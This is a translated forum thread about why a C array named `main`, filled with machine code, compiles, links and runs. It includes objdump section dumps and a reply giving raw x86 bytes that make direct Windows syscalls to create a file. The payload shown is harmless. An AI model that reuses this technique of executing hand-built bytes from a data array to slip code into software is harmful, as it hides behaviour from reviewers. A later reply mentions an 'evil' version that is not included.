读书人

Compilation process: why can this also be compiled? How sho

Posted: 2012-02-25 10:01:48 Author: rapoo

Compilation process: why can this also be compiled?
Let me throw the first brick at myself: the code (if it can even be called code) is garbage, of course. I only want to deepen my understanding of computer systems from the angle of the compilation process, so I posted this.

I'm not quite clear on why this code can be compiled as a standalone program:

//main.c
short main[] = {
277, 04735, -4129, 25, 0, 477, 1019, 0xbef, 0, 12800,
-113, 21119, 0x52d7, -1006, -7151, 0, 0x4bc, 020004,
14880, 10541, 2056, 04010, 4548, 3044, -6716, 0x9,
4407, 6, 5568, 1, -30460, 0, 0x9, 5570, 512, -30419,
0x7e82, 0760, 6, 0, 4, 02400, 15, 0, 4, 1280, 4, 0,
4, 0, 0, 0, 0x8, 0, 4, 0, ',', 0, 12, 0, 4, 0, '#',
0, 020, 0, 4, 0, 30, 0, 026, 0, 0x6176, 120, 25712,
'p', 072163, 'r', 29303, 29801, 'e'
};

That's all; nothing is missing.
Under VS2005, VS2008 and MinGW gcc (Dev-C++) it gives 0 warnings (/W3); it errors at run time because the author wrote it on Linux.
This is a typical form of overflow attack, but it seems the compiler only recognizes the main symbol from the start, without distinguishing array from function; as long as there is a main, it treats it as the entry point. Renaming the main array of course produces an error.
The relocatable object file main.o that the compiler produces for the current translation unit should still be split into a data section and a code section, and in a debug build it should also contain part of the source code.
So at link time, does the linker resolve the reference to main in the startup module (crt0.c...) directly to the main in main.o's data section? And then link, load and run?

Thanks..


[Solution]
First, a lone array can indeed be compiled (there is no syntax error), but normally it cannot be linked. This program is special: when it is compiled into an obj, the contents of this array happen to form a main function in the obj, so linking works as well.
[Solution]
I debugged it, and it really is like that. From the map file, main is in the data area. Setting the first element of the array to 0xcccc (the machine code for two int3s), it breaks immediately after running. It looks like the linker really does judge by the clothes and not the person.
[Solution]
The compiler treats main as the entry point. And the data in this array is special too, so it happens to compile.
VC6.0 cannot compile it; gcc compiles it successfully, and executing it gives a segmentation fault.
[Solution]
I looked into it using three compilers (gcc, vc, bcb) and two platforms (win7, linux).
Regardless of compiler or platform,
at compile time main's data is stored in the DATA section: (objdump t.obj)
Contents of section .data:
0000 1501dd09 dfef1900 0000dd01 fb03ef0b ................
0010 00000032 8fff7f52 d75212fc 11e40000 ...2...R.R......
0020 bc040420 203a2d29 08080808 c411e40b ... :-)........
0030 c4e50900 37110600 c0150100 04890000 ....7...........
0040 0900c215 00022d89 827ef001 06000000 ......-..~......
0050 04000005 0f000000 04000005 04000000 ................
0060 04000000 00000000 08000000 04000000 ................
0070 2c000000 0c000000 04000000 23000000 ,...........#...
0080 10000000 04000000 1e000000 16000000 ................
0090 76617800 70647000 73747200 77726974 vax.pdp.str.writ
00a0 6500 e.
After linking, the actual data is still in the DATA section (objdump t.exe)
(I also confirmed this with OllyDbg: when inserting a breakpoint at 403000 it warns: in the data area...)
Contents of section .data:
403000 1501dd09 dfef1900 0000dd01 fb03ef0b ................
403010 00000032 8fff7f52 d75212fc 11e40000 ...2...R.R......
403020 bc040420 203a2d29 08080808 c411e40b ... :-)........
403030 c4e50900 37110600 c0150100 04890000 ....7...........
403040 0900c215 00022d89 827ef001 06000000 ......-..~......
403050 04000005 0f000000 04000005 04000000 ................
403060 04000000 00000000 08000000 04000000 ................
403070 2c000000 0c000000 04000000 23000000 ,...........#...
403080 10000000 04000000 1e000000 16000000 ................
403090 76617800 70647000 73747200 77726974 vax.pdp.str.writ
4030a0 65000000 ffffffff ffffffff feffffff e...............
It's just that on Windows DATA has execute permission, so it can run up to
00403000 15 01DD09DF ADC EAX,DF09DD01 ; this instruction can run
00403005 EF OUT DX,EAX ; error here, insufficient privilege
The above is the Windows platform.
On the Linux platform main is likewise in the DATA area (objdump t), except some data is added in front of it
Contents of section .data:
80493c0 00000000 00000000 58950408 00000000 ........X.......
80493d0 00000000 00000000 00000000 00000000 ................
80493e0 1501dd09 dfef1900 0000dd01 fb03ef0b ................
80493f0 00000032 8fff7f52 d75212fc 11e40000 ...2...R.R......
8049400 bc040420 203a2d29 08080808 c411e40b ... :-)........
...
As for whether it can run in the data section at run time, that still needs testing.


But what is certain is that on either linux/windows, the code above cannot execute normally, because the code performs direct I/O operations and DX is random at that point.

But this does give us a special idea; with a little modification it could be entered in the IOCCC.

[Solution]
1. main is not a reserved word, so an array named main can be defined.
2. At link time the main symbol can be found.
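A check that follows from the two answers above (the objdump section listing and the two-point summary): since the linker resolves `main` by symbol name alone, a build step can verify that `main` actually lands in a text section. This is an added example, not code from the thread; it parses nm-style output, and the sample listings inside it are constructed, not captured from a real build.

```python
"""Check where the `main` symbol lives, from `nm` output.  The linker resolves
crt0's call to main by name alone (T/t text, D/d data, R/r read-only data,
B/b bss, U undefined are nm's type letters), so this has to be checked by hand."""
import re
# One nm line: "<hex addr> <type letter> <name>"; undefined symbols carry
# blank padding instead of an address.
_NM_LINE = re.compile(r"^(?P<addr>[0-9a-fA-F]+)?\s+(?P<type>[A-Za-z?])\s+(?P<name>\S+)\s*$")
_KIND = {"t": "text", "d": "data", "r": "rodata", "b": "bss", "u": "undefined"}

def parse_nm(output):
    """Map symbol name -> (type letter, address or None) for each nm line."""
    syms = {}
    for line in output.splitlines():
        m = _NM_LINE.match(line)
        if m:
            addr = int(m["addr"], 16) if m["addr"] else None
            syms[m["name"]] = (m["type"], addr)
    return syms

def classify_main(output):
    """Section kind holding `main` ('text', 'data', 'rodata', 'bss', 'undefined',
    'other' or 'missing'); `_main` covers 32-bit Windows targets."""
    syms = parse_nm(output)
    for name in ("main", "_main"):
        if name in syms:
            return _KIND.get(syms[name][0].lower(), "other")
    return "missing"

def main_is_code(output):
    """True only when `main` is a text-section symbol, which is what the
    startup code silently assumes when it calls it."""
    return classify_main(output) == "text"

# Constructed sample nm output (not captured from a real build): a normal
# program, the thread's `short main[]` build, and a `const` array (rodata).
NM_NORMAL = """\
0000000000001139 T main
                 U printf
0000000000004010 D table
"""
NM_SHORT_ARRAY = """\
0000000000004020 D main
                 U __libc_start_main
"""
NM_CONST_ARRAY = "00000000 R _main\n"
if __name__ == "__main__":
    for label, out in (("normal", NM_NORMAL), ("short[]", NM_SHORT_ARRAY),
                       ("const[]", NM_CONST_ARRAY)):
        print(f"{label:8s} main is in {classify_main(out)}; code? {main_is_code(out)}")
```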
[Solution]
Actually, early on there was no real distinction between data and code segments; segment protection like this only arrived with the 486, right? So code like this should have been executable in the early years.
[Solution]
Writing this on the Linux platform would be much simpler; int 80 is more convenient to work with than int 2e....

The following runs under win32 XP SP3, creates a file E:\test and writes Hello World into it

#ifdef __cplusplus
extern "C"
#endif

const unsigned char main[] = {
0x55,0x8B,0xEC,0x83,0xEC,0x58,0x66,0xC7,0x45,0xA8,0x5C,0x00,0x66,0xC7,0x45,0xAA,
0x3F,0x00,0x66,0xC7,0x45,0xAC,0x3F,0x00,0x66,0xC7,0x45,0xAE,0x5C,0x00,0x66,0xC7,
0x45,0xB0,0x45,0x00,0x66,0xC7,0x45,0xB2,0x3A,0x00,0x66,0xC7,0x45,0xB4,0x5C,0x00,
0x66,0xC7,0x45,0xB6,0x74,0x00,0x66,0xC7,0x45,0xB8,0x65,0x00,0x66,0xC7,0x45,0xBA,
0x73,0x00,0x66,0xC7,0x45,0xBC,0x74,0x00,0x66,0xC7,0x45,0xBE,0x00,0x00,0xC6,0x45,
0xDC,0x48,0xC6,0x45,0xDD,0x65,0xC6,0x45,0xDE,0x6C,0xC6,0x45,0xDF,0x6C,0xC6,0x45,
0xE0,0x6F,0xC6,0x45,0xE1,0x20,0xC6,0x45,0xE2,0x77,0xC6,0x45,0xE3,0x6F,0xC6,0x45,
0xE4,0x72,0xC6,0x45,0xE5,0x6C,0xC6,0x45,0xE6,0x64,0xC6,0x45,0xE7,0x0A,0xC6,0x45,
0xE8,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x18,0x00,0x00,0x00,
0x33,0xC0,0x89,0x45,0xC4,0x89,0x45,0xC8,0x89,0x45,0xCC,0x89,0x45,0xD0,0x89,0x45,
0xD4,0x66,0xC7,0x45,0xF4,0x16,0x00,0x66,0xC7,0x45,0xF6,0x18,0x00,0x8D,0x4D,0xA8,
0x89,0x4D,0xF8,0xC7,0x45,0xCC,0x40,0x00,0x00,0x00,0x8D,0x55,0xF4,0x89,0x55,0xC8,
0x6A,0x00,0x6A,0x00,0x6A,0x20,0x6A,0x03,0x6A,0x07,0x68,0x80,0x00,0x00,0x00,0x6A,
0x00,0x8D,0x45,0xEC,0x50,0x8D,0x4D,0xC0,0x51,0x68,0x00,0x00,0x10,0xC0,0x8D,0x55,
0xFC,0x52,0x6A,0x25,0xE8,0x47,0x00,0x00,0x00,0x83,0xC4,0x30,0x89,0x45,0xD8,0x83,
0x7D,0xD8,0x00,0x7C,0x33,0x6A,0x00,0x6A,0x00,0x6A,0x0C,0x8D,0x45,0xDC,0x50,0x8D,
0x4D,0xEC,0x51,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x8B,0x55,0xFC,0x52,0x68,0x12,0x01,
0x00,0x00,0xE8,0x19,0x00,0x00,0x00,0x83,0xC4,0x28,0x8B,0x45,0xFC,0x50,0x6A,0x19,
0xE8,0x0B,0x00,0x00,0x00,0x83,0xC4,0x08,0x8B,0x45,0xD8,0x8B,0xE5,0x5D,0xC3,0xCC,
0x8B,0x44,0x24,0x04,0x8D,0x54,0x24,0x08,0xCD,0x2E,0xC3,0x90,0x90,0x90,0x90,0x90
};


The following one is evil; it seems to have been posted by Kaiyong. Normally, better not to run it.....

